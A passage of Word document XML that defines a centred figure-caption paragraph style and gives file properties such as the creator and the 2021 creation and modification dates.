  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="12">
    <w:name w:val="图标题"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:val="en-GB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Office_11.1.0.9998_F1E327BC-269C-435d-A152-05C5408002CA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2021-05-16T07:30:00Z</dcterms:created>
  <dc:creator>木子</dc:creator>
  <cp:lastModifiedBy>木子</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-31T14:03:40Z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2052-11.1.0.9998</vt:lpwstr>
  </property>
</Properties>
</file>